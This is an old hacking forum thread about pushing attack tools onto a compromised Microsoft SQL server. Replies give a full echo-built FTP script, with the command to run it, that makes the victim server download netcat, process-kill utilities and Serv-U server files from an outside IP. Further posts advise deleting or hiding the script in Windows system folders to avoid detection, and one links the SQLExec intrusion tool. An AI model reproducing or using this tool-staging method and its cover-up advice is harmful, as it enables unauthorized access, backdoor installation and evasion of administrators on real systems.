hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant

TheDuck
Hello all smile.gif
I'm using the program SQLEXEC.EXE to connect to the SQL Vul,
when I'm trying to trasfer the file with TFTP Server I get 'SQL_ERROR'
How can I send the files any way?? dry.gif
GhostCow
QUOTE
echo open 123.456.34.45 21>msg.txt
echo user anonymous>>msg.txt
echo anony@anony.com>>msg.txt
echo type binary>>msg.txt
echo get nc.exe>>msg.txt
echo get tlist.exe>>msg.txt
echo get kill.exe>>msg.txt
echo get servu.ini>>msg.txt
echo get servu.exe>>msg.txt
echo get TzoLibr.dll>>msg.txt
echo get message.txt>>msg.txt
echo quit>>msg.txt

Once your putfile is ready you can launch it by typing the following command:
ftp -i -n -v -s:msg.txt


this is from the forum, props to who wrote this (i forgot who it is, sorry) ph34r.gif
TheDuck
And what is that? blink.gif
what can I do with that?
CraZy_A
QUOTE (TheDuck @ Oct 5 2003, 10:54 PM)
And what is that? blink.gif
what can I do with that?

eat it for breakfast maybe you will understand it after a while... laugh.gif
kenshin_efx
QUOTE (TheDuck @ Oct 5 2003, 10:54 PM)
And what is that? blink.gif
what can I do with that?

is another method
z0mbi3
what that doies is writes the information to connect to an ftp and get the files that are listed.
Since tftp works in udp packets(i think) they maybe lost and might cause an error...
so using ftp is much better
TheDuck
o.k.
10q all biggrin.gif
0xc0000005
the othere method is called "ftp script?" so, you exec the cmd "echo" to add 1 line into 1 text file and exec this with the cmd ftp -i -n -v -s:<file>.xxx

if it works, the server will connect 2 the IP will get these files and quit after complete.
prog
Does anyone have a link to 'SQLExec' to check for sql?
Joc00
http://www.yanbing.org/software/sqlexec.zip

best of luck biggrin.gif
misa
yes that one is the best sqlexec, i've been using it for a while now smile.gif
canardwc
I think that there still not many sysop that let the original pass and the box that still run this are already hacked :-)
Secondly, if you use the method with echo and so... don t forget to erase the file, i found many boxes with such files in the temp folder...

tho :-)
Chans
Yes what canardwc said is really true. Always delete the file with the echo commands in it. And try to hide it a bit better then just dir c:\. Like:
echo open 12.34.56.78 21 >> c:\WINNT\system32\wins\
etc.
Or any other dir which is hidden somewhere in win dir.
Because there are so many people who leave the file with the commands on the server in dir c:\.
Dalrok
I pref the ftp command too I also think it's safer then tfpt
cougar
read some tutorials first before you start hacking wink.gif
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.

 
Invision Power Board © 2001-2005 Invision Power Services, Inc.